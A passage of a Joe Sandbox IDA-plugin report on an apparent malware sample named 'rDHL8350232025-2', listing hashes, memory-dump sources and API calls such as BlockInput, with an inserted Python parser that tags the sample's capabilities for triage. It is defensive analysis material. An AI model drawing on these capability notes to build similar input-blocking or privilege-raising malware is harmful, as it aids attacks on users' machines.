                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                      • Instruction ID: 276aa894707942c63ed27cb6aeb695aa7bd2cffabf56c056d04cf534c4843174
                                                                                      • Opcode Fuzzy Hash: 9abac74846656c8270c126fbf99b99d3cf5cb2a917640e31a74d1e0beb97965b
                                                                                      • Instruction Fuzzy Hash: 8F32AC74900218DFEF65EF94C881EEDB7B9BF05304F148069E846BB292DB75AE49CB50
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00066766,?,?,00000008,?,?,0006FEFE,00000000), ref: 00066998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                                                                      • Instruction ID: 82c289e151f4f31c7b780caea2108a696b332f9d161759d20325bc0295797290
                                                                                      • Opcode Fuzzy Hash: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                                                                      • Instruction Fuzzy Hash: 14B14C31610608DFD755CF28C48AB697BE1FF45364F258658E89ACF2A2C736E991CB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                      • Instruction ID: e1f9390d9f25e16bc1eb94143f27fdd5d8c46aff02e9e554b92427adaf45ad9f
                                                                                      • Opcode Fuzzy Hash: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                      • Instruction Fuzzy Hash: 6C1250B19002299FDB64DF58C8806EEB7F5FF48710F5481AAE849EB251DB349E81CF94
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 000AEABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                      • Instruction ID: 0ede50adcfaecb5d9411b9ddadb8ff3bf4716b660c8580446f5e0bf718de675e
                                                                                      • Opcode Fuzzy Hash: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                      • Instruction Fuzzy Hash: 70E01A362002049FD710EF99D804E9AB7EDAFA9760F00842AFD49DB351DA70AC408B91
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                      • Instruction ID: 30439418e2658f28c5aae0a513585a5a54712a62a67685fcbd5bb606e5e02e31
                                                                                      • Opcode Fuzzy Hash: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                      • Instruction Fuzzy Hash:
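                                                                                      The per-function "APIs" entries above are the most useful part of this listing for triage, because the API name, its argument values and the `ref:` address together tell you what the function does (e.g. `BlockInput(00000001)` is a call with fBlockIt=TRUE, i.e. the sample is locking the user out of mouse and keyboard, not releasing them). The following is an added example, not part of the Joe Sandbox report: a small Python parser for entries in exactly this shape, which pulls out each call's name, module, arguments and reference address and maps the calls to coarse capability tags. The sample listing embedded in the block is copied from the entries above; the capability map is my own assumption and not something the report states.

```python
"""Parse Joe Sandbox per-function "APIs" entries and tag what each function can do.

Added example for triaging the function listing; not part of the sandbox report.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the "APIs" entries from the report listing,
# kept in the same shape (header line, bullet lines, then other metadata).
SAMPLE_LISTING = """\
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 000A6918
• FindClose.KERNEL32(00000000), ref: 000A6961
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: Find$CloseFileFirst
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0009B270
Similarity
• API ID: InputSendkeybd_event
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
• CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
APIs
• BlockInput.USER32(00000001), ref: 000AEABD
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
"""

# One bullet line of an "APIs" entry: Name.MODULE(args), ref: ADDRESS
API_LINE = re.compile(
    r"^•\s*(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Assumed capability map (mine, not from the report): API name -> what it implies.
CAPABILITY_TAGS = {
    "BlockInput": "blocks mouse/keyboard input",
    "SendInput": "synthesises keystrokes or mouse events",
    "keybd_event": "synthesises keystrokes",
    "AdjustTokenPrivileges": "enables token privileges",
    "SetUnhandledExceptionFilter": "installs top-level exception handler",
    "FindFirstFileW": "enumerates files/directories",
    "RaiseException": "raises an SEH exception",
}


def parse_listing(text):
    """Return one dict per "APIs" entry: {"apis": [{name, module, args, ref}, ...]}."""
    functions = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                # a new per-function entry starts here
            current = {"apis": []}
            functions.append(current)
            continue
        match = API_LINE.match(line)
        if match and current is not None:
            args = match.group("args")
            current["apis"].append({
                "name": match.group("api"),
                "module": match.group("module"),
                "args": args.split(",") if args else [],
                "ref": match.group("ref").upper(),
            })
        elif current is not None and not line.startswith("•"):
            current = None                # any other header ends this entry's API list
    return functions


def tag_function(func):
    """Capability tags for one entry; flags BlockInput(TRUE) explicitly."""
    tags = []
    for call in func["apis"]:
        tag = CAPABILITY_TAGS.get(call["name"])
        if tag is None:
            continue
        if call["name"] == "BlockInput" and call["args"][:1] == ["00000001"]:
            tag += " (fBlockIt=TRUE: input is being blocked, not released)"
        tags.append(tag)
    return tags


def summarize(functions):
    """Map each capability tag to the ref addresses where the call was seen."""
    by_tag = defaultdict(list)
    for func in functions:
        for call in func["apis"]:
            if call["name"] in CAPABILITY_TAGS:
                by_tag[CAPABILITY_TAGS[call["name"]]].append(call["ref"])
    return dict(by_tag)


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for entry in parsed:
        print([c["name"] for c in entry["apis"]], tag_function(entry))
    for tag, refs in summarize(parsed).items():
        print(f"{tag}: {', '.join(refs)}")
```

                                                                                      Running it over the real report is a matter of pasting the whole listing into `SAMPLE_LISTING` or reading it from a file; the ref addresses it collects are the ones to jump to in IDA when you want to confirm a capability by hand rather than trust the tag.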
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 9760d05a73ce98cd3e9533e2b73cc5d80217305d5b8fd789aca9d296cb7a17de
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 7751477168C6055ADFB88568A85D7FF63C9DB52302F180509DC8ED7282CE16EE0DF362
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                      • Instruction ID: 2d8f93fdac0a7e798ccf80a6027b4fe8ccfa2aa728c4295cdb1e0be65b5a4207
                                                                                      • Opcode Fuzzy Hash: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                      • Instruction Fuzzy Hash: 9E32F222D2AF414DE7239634DC22335A78AAFB73D9F15D737EC1AB59A5EB29C4834100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                      • Instruction ID: ff493c746c60c608e6bd2add35e8e3227f13083571656b4574ca26703f00cfd7
                                                                                      • Opcode Fuzzy Hash: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                      • Instruction Fuzzy Hash: 0E321171A002558BFFB8EA28C4D4EBC7BF1FB45314F28817AD5CA8B691D2309D81DB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d97d630c1c055d4586033ef2542eb7c796ae5838da1ebcdad871513da954c2bd
                                                                                      • Instruction ID: 103e852e209d199b3090ec3182ee546c74fa52a62be9e9cefdb5be0dbb0de696
                                                                                      • Opcode Fuzzy Hash: d97d630c1c055d4586033ef2542eb7c796ae5838da1ebcdad871513da954c2bd
                                                                                      • Instruction Fuzzy Hash: E922B2B0E0460ADFDF25CF64C881AEEB3F5FF44301F108529E81AA7291EB79A955CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63a700f514c1b14a2800b53d405d9bd8a4f51e6943ffd800d26c4f7199173c26
                                                                                      • Instruction ID: a39dfa5cd2237fd5ecc5c87f5bc7822f99e5edf4a54e8ecfa9a81c4a2e9cd014
                                                                                      • Opcode Fuzzy Hash: 63a700f514c1b14a2800b53d405d9bd8a4f51e6943ffd800d26c4f7199173c26
                                                                                      • Instruction Fuzzy Hash: 5202D8B0E00106EFDB15DF54D881AAEB7B5FF48300F11C169E81A9B291EB75EE11CB95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: e086eb4db394a85e079ec0a0296ec660d565ddfeca7436132be83485c0612334
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: 7B9175321080A34ADB69463A85356BFFFF15B923A371A079DDCF2CA1C1EE20895CD620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: 3c22fd8e610a89ff0294d01a078be1ec849a3850666fc59a280ee7f0b25379bd
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 949159722090A349EB6E427A85741BFFFE15B923A371A079DD8F2CA1C1FE14C55CD620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                      • Instruction ID: 1c239922c3d26797c019bb7979dd0dd58b6d849e8d3d07f815208a87b5e22845
                                                                                      • Opcode Fuzzy Hash: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                      • Instruction Fuzzy Hash: C661577160870956FAB49928B899BFF23D8DF81303F144919ED4EDB282DB119E4EF316
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                      • Instruction ID: 0974ede9832ee465892a7d7a63a0bbe8f64f14fc9af6c71efb813052626904df
                                                                                      • Opcode Fuzzy Hash: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                      • Instruction Fuzzy Hash: BB615A7120870956DEB84928785ABBF23F8DF45703F104959EC4BDB282EA129D4EF365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: 7da379901184674684e3663439507fe453b54dbc7ea72cad7aa46965708e76ad
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: BC81547250D0A309DBA9423D85346BFFFE15F923A371A079DD8F2CA1C1EE24995CD620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction ID: 6569cf7d32ce67223eb4bcbdc5997e2c60c205031f17abb9bc60e433f81e79e7
                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction Fuzzy Hash: 0341C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                      • Instruction ID: 09edbdb4bc4fdd216f7a3e9914ef2cb1cb304785a4d519dae52ca4d7d8ee5d11
                                                                                      • Opcode Fuzzy Hash: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                      • Instruction Fuzzy Hash: DF21B7326206118BD728CF79C823A7E73E5AB54310F15862EE4A7C37D1DE7AA944CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction ID: 0a4dd4fb006d553353d2ff9155e2812ff30119746deea2df57f537172ca6b74e
                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction Fuzzy Hash: DD019278A05109EFCB48DF98C5909AEF7B5FB48310F208599D909A7301D730AE41DB84
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction ID: 8080ae548c2520a77efd1c3141f686b779f0a2b3aef3133a14791d5c0cb59cae
                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction Fuzzy Hash: 5D01A478A05109EFCB48DF98C5909AEF7F5FF48310F208599D909A7301D730AE41DB84
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
